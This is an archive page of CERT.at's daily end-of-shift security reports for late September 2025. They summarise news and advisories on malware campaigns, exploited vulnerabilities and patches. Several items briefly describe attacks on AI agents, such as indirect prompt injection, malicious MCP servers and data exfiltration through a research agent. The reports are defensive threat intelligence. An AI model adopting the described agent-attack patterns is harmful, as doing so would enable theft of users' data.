===================== = End-of-Day report = ===================== Timeframe: Donnerstag 25-09-2025 18:00 − Freitag 26-09-2025 18:00 Handler: Guenes Holler Co-Handler: Felician Fuchs ===================== = News = ===================== ∗∗∗ Schwerwiegende Sicherheitslücken in Cisco Adaptive Security Appliance - aktiv ausgenutzt - Updates verfügbar ∗∗∗ --------------------------------------------- Cisco hat Informationen zu einer vermutlich bereits seit einigen Monaten laufenden Angriffskampagne veröffentlicht. Im Rahmen dieser Kampagne haben Angreifer:innen, denen bereits im vergangenen Jahr eine breitgefächerte Kampagne gegen Edge-Devices zugerechnet wurde, Cisco Adaptive Security Appliance (ASA) Systeme der 5500-X Reihe welche "VPN web services" kompromittiert um in weiterer Folge auf den übernommenen Geräten Schadsoftware zu platzieren und Daten zu stehlen. --------------------------------------------- https://www.cert.at/de/warnungen/2025/9/schwerwiegende-sicherheitslucken-in… ∗∗∗ Unofficial Postmark MCP npm silently stole users emails ∗∗∗ --------------------------------------------- A npm package copying the official postmark-mcp project on GitHub turned bad with the latest update that added a single line of code to exfiltrate all its users email communication. --------------------------------------------- https://www.bleepingcomputer.com/news/security/unofficial-postmark-mcp-npm-… ∗∗∗ Salesforce AI Agents Forced to Leak Sensitive Data ∗∗∗ --------------------------------------------- Yet again researchers have uncovered an opportunity (dubbed "ForcedLeak") for indirect prompt injection against autonomous agents lacking sufficient security controls — but this time the risk involves PII, corporate secrets, physical location data, and so much more. --------------------------------------------- https://www.darkreading.com/vulnerabilities-threats/salesforce-ai-agents-le… ∗∗∗ HeartCrypt’s wholesale impersonation effort ∗∗∗ --------------------------------------------- How the notorious Packer-as-a-Service operation built itself into a hydra. --------------------------------------------- https://news.sophos.com/en-us/2025/09/26/heartcrypts-wholesale-impersonatio… ∗∗∗ New COLDRIVER Malware Campaign Joins BO Team and Bearlyfy in Russia-Focused Cyberattacks ∗∗∗ --------------------------------------------- The Russian advanced persistent threat (APT) group known as COLDRIVER has been attributed to a fresh round of ClickFix-style attacks designed to deliver two new "lightweight" malware families tracked as BAITSWITCH and SIMPLEFIX. --------------------------------------------- https://thehackernews.com/2025/09/new-coldriver-malware-campaign-joins-bo.h… ∗∗∗ North Koreas Lazarus Group shares its malware with IT work scammers ∗∗∗ --------------------------------------------- North Korean-linked crews connected to the pervasive IT worker scams have upped their malware game, using more advanced tools, including a backdoor that has much of the same code as Pyongyang's infamous Lazarus Group deploys. --------------------------------------------- https://theregister.com/2025/09/25/lazarus_group_shares_malware_with_it_sca… ∗∗∗ LockBits new variant is most dangerous yet, hitting Windows, Linux and VMware ESXi ∗∗∗ --------------------------------------------- Trend Micro has sounded the alarm over the new LockBit 5.0 ransomware strain, which it warns is "significantly more dangerous" than past versions due to its newfound ability to simultaneously target Windows, Linux, and VMware ESXi environments. --------------------------------------------- https://theregister.com/2025/09/26/lockbits_new_variant_is_most/ ∗∗∗ Vietnamese Hackers Use Fake Copyright Notices to Spread Lone None Stealer ∗∗∗ --------------------------------------------- New Lone None Stealer uses Telegram C2 and DLL side-loading to grab passwords, credit cards, and crypto. Find out how to spot this highly evasive phishing scam. --------------------------------------------- https://hackread.com/vietnamese-hackers-fake-copyright-notice-lone-none-ste… ∗∗∗ It Is Bad (Exploitation of Fortra GoAnywhere MFT CVE-2025-10035) - Part 2 ∗∗∗ --------------------------------------------- We’re back, just over 24 hours later, to share our evolving understanding of CVE-2025-10035. --------------------------------------------- https://labs.watchtowr.com/it-is-bad-exploitation-of-fortra-goanywhere-mft-… ∗∗∗ SVG Phishing hits Ukraine with Amatera Stealer, PureMiner ∗∗∗ --------------------------------------------- Phishing emails disguised as official notices from Ukraine’s police deliver Amatera Stealer and PureMiner in a fileless attack chain. --------------------------------------------- https://www.fortinet.com/blog/threat-research/svg-phishing-hits-ukraine-wit… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (firefox, kernel, and thunderbird), Debian (ceph and thunderbird), Fedora (chromium, mingw-expat, python-deepdiff, python-orderly-set, python-pip, rust-az-cvm-vtpm, rust-az-snp-vtpm, rust-az-tdx-vtpm, and trustee-guest-components), Oracle (aide, kernel, and thunderbird), Red Hat (firefox, kernel, openssh, perl-YAML-LibYAML, and thunderbird), Slackware (expat), SUSE (jasper, libssh, openjpeg2, and python-pycares), and Ubuntu (linux-aws-6.14, linux-hwe-6.14, linux-azure, linux-hwe-6.8, linux-realtime-6.8, node-sha.js, and pcre2). --------------------------------------------- https://lwn.net/Articles/1039749/ ∗∗∗ [R1] Stand-alone Security Patch Available for Tenable Security Center versions 6.5.1 and 6.6.0: SC-202509.1 ∗∗∗ --------------------------------------------- Security Center leverages third-party software to help provide underlying functionality. One of the third-party components (PostgreSQL) was found to contain vulnerabilities, and an updated version has been made available by the provider. --------------------------------------------- https://www.tenable.com/security/tns-2025-18 ∗∗∗ Security Update Dingtian DT-R002 ∗∗∗ --------------------------------------------- All versions of Dingtian DT-R002 are vulnerable to an Insufficiently Protected Credentials vulnerability that could allow an attacker to retrieve the current user's username without authentication. --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-268-01 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 25.09.2025
by Daily end-of-shift report 25 Sep '25

25 Sep '25

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 24-09-2025 18:00 − Donnerstag 25-09-2025 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Microsoft will offer free Windows 10 security updates in Europe ∗∗∗ --------------------------------------------- Microsoft will offer free extended security updates for Windows 10 users in the European Economic Area (EEA), which includes Iceland, Liechtenstein, Norway, and all 27 European Union member states. --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/microsoft-will-offer-free-w… ∗∗∗ Malicious Rust packages on Crates.io steal crypto wallet keys ∗∗∗ --------------------------------------------- Two malicious packages with nearly 8,500 downloads in Rusts official crate repository scanned developers systems to steal cryptocurrency private keys and other secrets. --------------------------------------------- https://www.bleepingcomputer.com/news/security/malicious-rust-packages-on-c… ∗∗∗ Supermicro: Unzählige Server-Mainboards anfällig für Firmware-Backdoors ∗∗∗ --------------------------------------------- Angreifer können in die BMC-Firmware zahlreicher Mainboards von Supermicro Malware einschleusen und damit dauerhaft die Kontrolle übernehmen. --------------------------------------------- https://www.golem.de/news/supermicro-unzaehlige-server-mainboards-anfaellig… ∗∗∗ XCSSET evolves again: Analyzing the latest updates to XCSSET’s inventory ∗∗∗ --------------------------------------------- Microsoft Threat Intelligence has uncovered a new variant of the XCSSET malware, which is designed to infect Xcode projects, typically used by software developers building Apple or macOS-related applications. --------------------------------------------- https://www.microsoft.com/en-us/security/blog/2025/09/25/xcsset-evolves-aga… ∗∗∗ OnePlus leaves researchers on read over Android bug that exposes texts ∗∗∗ --------------------------------------------- Rapid7 warns flaw could let any app peek at your SMS, but smartphone vendor wont pick up Updated Security researchers report that OnePlus smartphone users remain vulnerable to a critical bug that allows any application to read SMS and .. --------------------------------------------- https://www.theregister.com/2025/09/23/rapid7_oneplus_android_bug/ ∗∗∗ Jetzt patchen! Root-Attacken auf Cisco-Netzwerkgeräte möglich ∗∗∗ --------------------------------------------- Der Netzwerkausrüster Cisco warnt vor Angriffen unter anderem auf Router und Switches. Admins sollten die aktuellen Sicherheitsupdates installieren. --------------------------------------------- https://www.heise.de/news/Jetzt-patchen-Angreifer-attackieren-Netzwerkgerae… ∗∗∗ Zu unsicher: IT-Dienstleister NTT Data trennt sich wohl von Ivanti-Produkten ∗∗∗ --------------------------------------------- Nicht nur das interne Netz, sondern auch der Weiterverkauf an Kunden ist betroffen. Die Sicherheit der Produkte sei ein unvertretbares Risiko. --------------------------------------------- https://www.heise.de/news/Zu-unsicher-IT-Dienstleister-NTT-Data-trennt-sich… ∗∗∗ Kriminelle kündigen Bankanruf per SMS oder WhatsApp an ∗∗∗ --------------------------------------------- Dass Kriminelle sich am Telefon als Bankmitarbeiter:innen ausgeben, ist seit Langem bekannt. Neu ist jedoch eine besonders raffinierte Variante, die derzeit im Umlauf ist. Dabei bauen die Kriminellen gezielt Vertrauen auf, indem sie den Anruf vorab per SMS oder WhatsApp-Nachricht ankündigen. --------------------------------------------- https://www.watchlist-internet.at/news/kriminelle-kuendigen-bankanruf-per-s… ∗∗∗ International anti-fraud crackdown recovers more than $400 million, Interpol says ∗∗∗ --------------------------------------------- Authorities from more than 40 countries and territories blocked 68,000 bank accounts and froze about 400 cryptocurrency wallets as part of the operation from April through August, Interpol said. --------------------------------------------- https://therecord.media/anti-fraud-interpol-crackdown-recovers-over-400-mil… ∗∗∗ Securing Microsoft Entra ID: Lessons from the Field – Part 1 ∗∗∗ --------------------------------------------- This multipart blog series is focused on the real-world lessons learned while securing Microsoft Entra ID. Based on hands-on experience across various environments and organizations, we’ll explore the practical, high-impact strategies that work and more importantly, the common misconfigurations, overlooked settings, and pitfalls that can .. --------------------------------------------- https://blog.nviso.eu/2025/09/25/securing-microsoft-entra-id-lessons-from-t… ∗∗∗ This Is How Your LLM Gets Compromised ∗∗∗ --------------------------------------------- Poisoned data. Malicious LoRAs. Trojan model files. AI attacks are stealthier than ever—often invisible until it’s too late. Here’s how to catch them before they catch you. --------------------------------------------- https://www.trendmicro.com/en_us/research/25/i/prevent-llm-compromise.html ∗∗∗ Another BRICKSTORM: Stealthy Backdoor Enabling Espionage into Tech and Legal Sectors ∗∗∗ --------------------------------------------- Google Threat Intelligence Group (GTIG) is tracking BRICKSTORM malware activity, which is being used to maintain persistent access to victim organizations in the United States. Since March 2025, Mandiant Consulting has responded to intrusions across a range of industry verticals, most notably legal services, Software as a Service .. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espiona… ∗∗∗ 180,000 ICS/OT Devices and Counting: The Unforgivable Exposure ∗∗∗ --------------------------------------------- A new Bitsight TRACE threat research report shows that Industrial Control System and Operational Technology (ICS/OT) exposure is climbing again. --------------------------------------------- https://www.bitsight.com/blog/the-growing-exposure-of-ics-ot-devices ∗∗∗ Yet Another Random Story: VBScripts Randomize Internals ∗∗∗ --------------------------------------------- In one of our recent posts, Dennis shared an interesting case study of C# exploitation that rode on Random-based password-reset tokens. He demonstrated how to use the single-packet attack, or a bit of old-school math, to beat the game. Recently, I performed a security test on a target which had a dependency written in VBScript. This blog post focuses .. --------------------------------------------- https://blog.doyensec.com/2025/09/25/yet-another-random-story.html ===================== = Vulnerabilities = ===================== ∗∗∗ Zahlreiche Schwachstellen in iMonitorSoft EAM ∗∗∗ --------------------------------------------- https://sec-consult.com/de/vulnerability-lab/advisory/zahlreiche-schwachste… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 24.09.2025
by Daily end-of-shift report 24 Sep '25

24 Sep '25

===================== = End-of-Day report = ===================== Timeframe: Dienstag 23-09-2025 18:00 − Mittwoch 24-09-2025 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Supermicro server motherboards can be infected with unremovable malware ∗∗∗ --------------------------------------------- One of the two vulnerabilities is the result of an incomplete patch Supermicro released in January, said Alex Matrosov, founder and CEO of Binarly, the security firm that discovered it. [..] The two new vulnerabilities—tracked as CVE-2025-7937 and CVE-2025-6198—reside inside silicon soldered onto Supermicro motherboards that run servers inside data centers. [..] Supermicro said it has updated the BMC firmware to mitigate the vulnerabilities. The company is currently testing and validating affected products. --------------------------------------------- https://arstechnica.com/security/2025/09/supermicro-server-motherboards-can… ∗∗∗ PyPI urges users to reset credentials after new phishing attacks ∗∗∗ --------------------------------------------- The Python Software Foundation has warned victims of a new wave of phishing attacks using a fake Python Package Index (PyPI) website to reset credentials. --------------------------------------------- https://www.bleepingcomputer.com/news/security/pypi-urges-users-to-reset-cr… ∗∗∗ YiBackdoor: A New Malware Family With Links to IcedID and Latrodectus ∗∗∗ --------------------------------------------- Zscaler ThreatLabz has identified a new malware family that we named YiBackdoor, which was first observed in June 2025. The malware is particularly interesting because it contains significant code overlaps with IcedID and Latrodectus. Similar to Zloader and Qakbot, IcedID was originally designed for facilitating banking and wire fraud. --------------------------------------------- https://www.zscaler.com/blogs/security-research/yibackdoor-new-malware-fami… ∗∗∗ Fake Malwarebytes, LastPass, and others on GitHub serve malware ∗∗∗ --------------------------------------------- Fake software—including Malwarebytes and LastPass—is currently circulating on GitHub pages, in a large-scale campaign targeting Mac users. --------------------------------------------- https://www.malwarebytes.com/blog/news/2025/09/fake-malwarebytes-lastpass-a… ∗∗∗ Betrugs-Website mit Fake-Investitionsprojekt im Stil von orf.at ∗∗∗ --------------------------------------------- Plus gefälschtes Video von Bundespräsident Van der Bellen. Die Täter wollen persönliche Daten abgreifen und 250 Euro abkassieren --------------------------------------------- https://www.derstandard.at/story/3000000289130/betrugs-website-mit-fake-inv… ∗∗∗ Another BRICKSTORM: Stealthy Backdoor Enabling Espionage into Tech and Legal Sectors ∗∗∗ --------------------------------------------- Google Threat Intelligence Group (GTIG) is tracking BRICKSTORM malware activity, which is being used to maintain persistent access to victim organizations in the United States. [..] The value of these targets extends beyond typical espionage missions, potentially providing data to feed development of zero-days and establishing pivot points for broader access to downstream victims. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espiona… ∗∗∗ Is This Bad? This Feels Bad. (Fortra GoAnywhere CVE-2025-10035) ∗∗∗ --------------------------------------------- On Thursday, September 18, Fortra published a security advisory fi-2025-012 titled: Deserialization Vulnerability in GoAnywhere MFT's License Servlet. The title in itself is reason for alarm, with the description going further to explain how we likely got to a CVSS 10.0 [..] No mystery is complete without a few unanswered questions. Despite our usual routine of reverse engineering and creative detours, we’ve ended this one with more questions than usual. --------------------------------------------- https://labs.watchtowr.com/is-this-bad-this-feels-bad-goanywhere-cve-2025-1… ∗∗∗ Mobilfunk-Server mit 100.000 SIM-Karten in New York beschlagnahmt ∗∗∗ --------------------------------------------- Rund um das New Yorker Hauptquartier der UNO wurden 300 SIM-Karten-Server und 100.000 SIM-Karten entdeckt. Deren Zweck ist undeutlich. --------------------------------------------- https://heise.de/-10668021 ∗∗∗ Cyberattacke auf Flughäfen: Weiterhin Probleme am BER und eine Festnahme ∗∗∗ --------------------------------------------- Auch Tage nach der Cyberattacke halten die Beeinträchtigungen am Flughafen BER an. In Großbritannien wurde indessen ein Tatverdächtiger festgenommen. --------------------------------------------- https://heise.de/-10669658 ∗∗∗ How MCP Authentication Flaws Enable RCE in Claude Code, Gemini CLI, and More ∗∗∗ --------------------------------------------- During our security testing, we discovered that connecting to a malicious MCP server via common coding tools like Claude Code and Gemini CLI could give attackers instant control over user computers. --------------------------------------------- https://verialabs.com/blog/from-mcp-to-shell/ ===================== = Vulnerabilities = ===================== ∗∗∗ Unpatched flaw in OnePlus phones lets rogue apps text messages ∗∗∗ --------------------------------------------- A vulnerability in multiple OnePlus OxygenOS versions allows any installed app to access SMS data and metadata without requiring permission or user interaction. [..] The flaw, tracked as CVE-2025-10184, and discovered by Rapid7 researchers, is currently unpatched and exploitable. --------------------------------------------- https://www.bleepingcomputer.com/news/security/unpatched-flaw-in-oneplus-ph… ∗∗∗ Two Critical Flaws Uncovered in Wondershare RepairIt Exposing User Data and AI Models ∗∗∗ --------------------------------------------- Cybersecurity researchers have disclosed two security flaws in Wondershare RepairIt that exposed private user data and potentially exposed the system to artificial intelligence (AI) model tampering and supply chain risks. [..] Successful exploitation of the two flaws can allow an attacker to circumvent authentication protection on the system and launch a supply chain attack, ultimately resulting in the execution of arbitrary code on customers' endpoints. [..] The cybersecurity company said it responsibly disclosed the two issues through its Zero Day Initiative (ZDI) in April 2025, but not that it has yet to receive a response from the vendor despite repeated attempts. In the absence of a fix, users are recommended to "restrict interaction with the product." CVE-2025-10643, CVE-2025-10644 --------------------------------------------- https://thehackernews.com/2025/09/two-critical-flaws-uncovered-in.html ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (kernel and kernel-rt), Fedora (expat), Red Hat (kernel and multiple packages), SUSE (avahi, busybox, busybox-links, kernel, sevctl, tcpreplay, thunderbird, and tor), and Ubuntu (isc-kea, linux, linux-aws, linux-gcp, linux-gke, linux-gkeop, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-aws-6.8, linux-gcp-6.8, linux-aws-fips, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux-realtime, python-pip, and rabbitmq-server). --------------------------------------------- https://lwn.net/Articles/1039311/ ∗∗∗ Libraesva ESG Security advisory: command injection vulnerability (CVE-2025-59689) ∗∗∗ --------------------------------------------- https://docs.libraesva.com/knowledgebase/security-advisory-command-injectio… ∗∗∗ ZDI-25-907: Autodesk Revit RFA File Parsing Type Confusion Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-25-907/ ∗∗∗ Google Chrome: Chrome for Android Update ∗∗∗ --------------------------------------------- http://chromereleases.googleblog.com/2025/09/chrome-for-android-update_23.h… ∗∗∗ Google Chrome: Stable Channel Update for Desktop ∗∗∗ --------------------------------------------- http://chromereleases.googleblog.com/2025/09/stable-channel-update-for-desk… ∗∗∗ AutomationDirect CLICK PLUS ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-266-01 ∗∗∗ Mitsubishi Electric MELSEC-Q Series CPU Module ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-266-02 ∗∗∗ Viessmann Vitogate 300 ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-266-04 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 23.09.2025
by Daily end-of-shift report 23 Sep '25

23 Sep '25

===================== = End-of-Day report = ===================== Timeframe: Montag 22-09-2025 18:00 − Dienstag 23-09-2025 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ SonicWall releases SMA100 firmware update to wipe rootkit malware ∗∗∗ --------------------------------------------- SonicWall has released a firmware update that can help customers remove rootkit malware deployed in attacks targeting SMA 100 series devices. --------------------------------------------- https://www.bleepingcomputer.com/news/security/sonicwall-releases-sma100-fi… ∗∗∗ GitHub Mandates 2FA and Short-Lived Tokens to Strengthen npm Supply Chain Security ∗∗∗ --------------------------------------------- GitHub on Monday announced that it will be changing its authentication and publishing options "in the near future" in response to a recent wave of supply chain attacks targeting the npm ecosystem, including the Shai-Hulud attack. This includes steps to address threats posed by token abuse and self-replicating malware by allowing local publishing with required two-factor authentication (2FA), granular tokens that will have a limited lifetime of seven days, and trusted publishing, which enables the ability to securely publish npm packages directly from CI/CD workflows using OpenID Connect (OIDC). --------------------------------------------- https://thehackernews.com/2025/09/github-mandates-2fa-and-short-lived.html ∗∗∗ Vier Jahre langes Hin und Her zwischen Sicherheitsforscher und Vasion Print ∗∗∗ --------------------------------------------- Vasion Print war oder ist sogar noch verwundbar. Ob bereits alle Schwachstellen geschlossen sind, ist auf den ersten Blick nicht erkennbar. --------------------------------------------- https://www.heise.de/news/Vier-Jahre-langes-Hin-und-Her-zwischen-Sicherheit… ∗∗∗ [Guest Diary] Distracting the Analyst for Fun and Profit, (Tue, Sep 23rd) ∗∗∗ --------------------------------------------- Distributed denial of service (DDoS) attacks are a type of cyber-attack where the threat actor attempts to disrupt a service by flooding the target with a ton of requests to overload system resources and prevent legitimate traffic from reaching it. [..] We can draw a few conclusions from analyzing each wave of this attack. --------------------------------------------- https://isc.sans.edu/diary/rss/32308 ∗∗∗ Technical Analysis of Zloader Updates ∗∗∗ --------------------------------------------- Zloader (a.k.a. Terdot, DELoader, or Silent Night) is a Zeus-based modular trojan that emerged in 2015. Zloader was originally designed to facilitate banking, but has since been repurposed for initial access, providing an entry point into corporate environments for the deployment of ransomware. --------------------------------------------- https://www.zscaler.com/blogs/security-research/technical-analysis-zloader-… ∗∗∗ CISA Shares Lessons Learned from an Incident Response Engagement ∗∗∗ --------------------------------------------- The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory to highlight lessons learned from an incident response engagement CISA conducted at a U.S. federal civilian executive branch (FCEB) agency. CISA is publicizing this advisory to reinforce the importance of prompt patching, as well as preparing for incidents by practicing incident response plans and by implementing logging and aggregating logs in a centralized out-of-band location. --------------------------------------------- https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-266a ===================== = Vulnerabilities = ===================== ∗∗∗ SolarWinds releases third patch to fix Web Help Desk RCE bug ∗∗∗ --------------------------------------------- SolarWinds has released a hotfix for a critical a critical vulnerability in Web Help Desk that allows remote code execution (RCE) without authentication. Tracked as CVE-2025-26399, the security issue is the company's third attempt to address an older flaw identified as CVE-2024-28986 that impacted Web Help Desk (WHD) 12.8.3 and all previous versions. --------------------------------------------- https://www.bleepingcomputer.com/news/security/solarwinds-releases-third-pa… ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (corosync and kernel), Fedora (checkpointctl, chromium, curl, and perl-Catalyst-Authentication-Credential-HTTP), SUSE (firefox, frr, kernel, rustup, vim, and wireshark), and Ubuntu (glibc and pam). --------------------------------------------- https://lwn.net/Articles/1039124/ ∗∗∗ Fehlende Validierung von Zertifikaten führt zu RCE in CleverControl Überwachungssoftware für Mitarbeitende ∗∗∗ --------------------------------------------- Eine fehlende Validierung des TLS Serverzertifikats in dem Installer der "CleverControl" Überwachungssoftware für Mitarbeitende erlaubt es Angreifern, die sich in die Netzwerkverbindung zwischen Client und Server platzieren können, beliebigen Code mit Administratorrechten auszuführen. CVE-2025-10548 --------------------------------------------- https://sec-consult.com/de/vulnerability-lab/advisory/fehlende-validierung-… ∗∗∗ WebKitGTK and WPE WebKit Security Advisory WSA-2025-0006 ∗∗∗ --------------------------------------------- https://webkitgtk.org/security/WSA-2025-0006.html -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 22.09.2025
by Daily end-of-shift report 22 Sep '25

22 Sep '25

===================== = End-of-Day report = ===================== Timeframe: Freitag 19-09-2025 18:00 − Montag 22-09-2025 18:00 Handler: Michael Schlagenhaufer Co-Handler: Guenes Holler ===================== = News = ===================== ∗∗∗ Cyberattacke auf Dienstleister behindert Flughäfen in Europa ∗∗∗ --------------------------------------------- Ein Dienstleister für die Systeme zur Passagierabfertigung ist am Freitagabend angegriffen worden, wie der Berliner Flughafen mitteilte. [..] Der Systemanbieter wird europaweit an Flughäfen eingesetzt. [..] Passagiere müssen nun mit längeren Wartezeiten beim Check-in und Boarding und mit Verspätungen rechnen. --------------------------------------------- https://www.heise.de/news/Cyberangriff-behindert-europaeische-Flughaefen-au… ∗∗∗ LastPass: Fake password managers infect Mac users with malware ∗∗∗ --------------------------------------------- LastPass is warning users of a campaign that targets macOS users with malicious software impersonating popular products delivered through fraudulent GitHub repositories. [..] The attackers created a large number of deceptive GitHub repositories from multiple accounts to evade takedown and optimize them to rank high in search results. --------------------------------------------- https://www.bleepingcomputer.com/news/security/lastpass-fake-password-manag… ∗∗∗ BlockBlasters: Infected Steam game downloads malware disguised as patch ∗∗∗ --------------------------------------------- A 2D platformer game called BlockBlasters has recently started showing signs of malicious activity after a patch release on August 30. While the user is playing the game, various bits of information are lifted from the PC the game is running on - including crypto wallet data. Hundreds of users are potentially affected. --------------------------------------------- https://feeds.feedblitz.com/~/925181471/0/gdatasecurityblog-en~BlockBlaster… ∗∗∗ Understanding Spamhaus and Its Role in Email Security ∗∗∗ --------------------------------------------- One of the often “behind‐the‐scenes” organizations helping to defend email systems is Spamhaus. In this post, we’ll explain what Spamhaus is, how it works, why it matters, and what best practices companies should follow to stay out of blacklists and protect deliverability. --------------------------------------------- https://blog.sucuri.net/2025/09/understanding-spamhaus-and-its-role-in-emai… ∗∗∗ Researchers Uncover GPT-4-Powered MalTerminal Malware Creating Ransomware, Reverse Shell ∗∗∗ --------------------------------------------- Cybersecurity researchers have discovered what they say is the earliest example known to date of a malware with that bakes in Large Language Model (LLM) capabilities.The malware has been codenamed MalTerminal by SentinelOne SentinelLABS research team. --------------------------------------------- https://thehackernews.com/2025/09/researchers-uncover-gpt-4-powered.html ∗∗∗ Achtung vor WKO Phishing-Mails zu angeblichen Abgabenrückständen! ∗∗∗ --------------------------------------------- Derzeit erhalten viele Unternehmen eine gefälschte E-Mail, die angeblich von der Wirtschaftskammer Österreich (WKO) stammt. Darin wird behauptet, es gebe offene Abgaben von 482,00 Euro, die über einen Link bezahlt werden sollen. Achtung: Zahlen Sie nicht, es handelt sich um einen Betrugsversuch! --------------------------------------------- https://www.watchlist-internet.at/news/achtung-vor-wko-phishing-mails-zu-an… ∗∗∗ Fake-Shops: Kriminelle nutzen die finnische Kultmarke „Marimekko“ als Deckmantel ∗∗∗ --------------------------------------------- Derzeit tauchen auf Social-Media-Plattformen vermehrt Werbeanzeigen auf, die ungewöhnlich hohe Rabatte in Marimekko-Onlineshops versprechen. Natürlich stimmt daran nichts. Die Spezialpreise sollen die Fans der finnischen Design-Marke zu Impulskäufen verleiten. Geliefert werden die bestellten Produkte nie, das Geld ist weg. --------------------------------------------- https://www.watchlist-internet.at/news/fake-shops-marimekko/ ∗∗∗ Iranian Threat Actor Nimbus Manticore Expands Campaigns into Europe with Advanced Malware and Fake Job Lures ∗∗∗ --------------------------------------------- In this blog, we highlight the evolution of Minibike into a new variant dubbed MiniJunk, the use of fake recruiting portals for malware delivery, victimology across the Middle East and Western Europe, and the broader implications for defense, telecom, and aviation sectors. --------------------------------------------- https://blog.checkpoint.com/research/iranian-threat-actor-nimbus-manticore-… ∗∗∗ Hacking with AI SASTs: An overview of ‘AI Security Engineers’ / ‘LLM Security Scanners’ for Penetration Testers and Security Teams ∗∗∗ --------------------------------------------- For the past few months, I have been trialing various AI-native security scanners, with a main focus on finding a product on the market today that is able to analyze the source code of a project in order to find vulnerabilities. This post will detail that journey, the successes and failures I’ve come across, my thoughts, and offer a general review of new on-the-market products that fit the category. --------------------------------------------- https://joshua.hu/llm-engineer-review-sast-security-ai-tools-pentesters ∗∗∗ Kernel Security in the Wild: Side-Channel-Assisted Exploit Techniques, Kernel-Level Defenses, and Real-World Analysis ∗∗∗ --------------------------------------------- In this thesis, we address all three challenges to advance the state of kernel security. [..] We introduce three novel side channels: SLUBStick, a timing side channel on the kernel’s memory allocator to infer heap memory reuse; KernelSnitch, a software- induced side channel that leaks the location of kernel heap objects via data structure access timing; and a hardware-induced TLB side channel that leaks fine-grained memory layout information. --------------------------------------------- https://tugraz.elsevierpure.com/ws/portalfiles/portal/98775241/main.pdf ===================== = Vulnerabilities = ===================== ∗∗∗ VU#780141: Cross-site scripting vulnerability in Lectora course navigation ∗∗∗ --------------------------------------------- Lectora Desktop versions 21.0–21.3 and Lectora Online versions 7.1.6 and older contained a cross-site scripting (XSS) vulnerability in courses published with Seamless Play Publish (SPP) enabled and Web Accessibility disabled. The vulnerability was initially patched in Lectora Desktop version 21.4 (October 25, 2022), but users must republish existing courses to apply the patch. CVE-2025-9125 --------------------------------------------- https://kb.cert.org/vuls/id/780141 ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (ffmpeg, jetty12, jetty9, jq, and pam), Fedora (curl, libssh, podman-tui, and prometheus-podman-exporter), Oracle (firefox, gnutls, kernel, and thunderbird), and SUSE (bluez, cairo, chromium, cmake, cups, firefox, frr, govulncheck-vulndb, kernel, kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-t, mariadb, mybatis, ognl, python-h2, and rke2). --------------------------------------------- https://lwn.net/Articles/1039053/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 19.09.2025
by Daily end-of-shift report 19 Sep '25

19 Sep '25

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 18-09-2025 18:00 − Freitag 19-09-2025 18:00 Handler: Felician Fuchs Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Backup-Diebstahl: Angreifer stahlen bei Sonicwall Firewallkonfigurationen ∗∗∗ --------------------------------------------- Der Firewallhersteller Sonicwall meldet einen Einbruch in Cloud-Konten seiner Kunden. Dabei haben Unbekannte Sicherungskopien von Firewallkonfigurationsdateien unerlaubt vervielfältigt und exfiltriert. Es handelt sich jedoch nicht um einen Cyberangriff auf Sonicwall, sondern offenbar um massenhaftes Durchprobieren von Zugangsdaten. [..] Die entwendeten Konfigurationsdateien können sensible Informationen enthalten und Angriffe erleichtern. Offenbar sind nur wenige Kunden betroffen. --------------------------------------------- https://heise.de/-10662565 ∗∗∗ CISA exposes malware kits deployed in Ivanti EPMM attacks ∗∗∗ --------------------------------------------- The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published an analysis of the malware deployed in attacks exploiting vulnerabilities affecting Ivanti Endpoint Manager Mobile (EPMM). The flaws are an authentication bypass in EPMM’s API component (CVE-2025-4427) and a code injection vulnerability (CVE-2025-4428) that allows execution of arbitrary code. --------------------------------------------- https://www.bleepingcomputer.com/news/security/cisa-exposes-malware-kits-de… ∗∗∗ New attack on ChatGPT research agent pilfers secrets from Gmail inboxes ∗∗∗ --------------------------------------------- Today’s installment hits OpenAI’s Deep Research agent. Researchers recently devised an attack that plucked confidential information out of a user’s Gmail inbox and sent it to an attacker-controlled web server, with no interaction required on the part of the victim and no sign of exfiltration. --------------------------------------------- 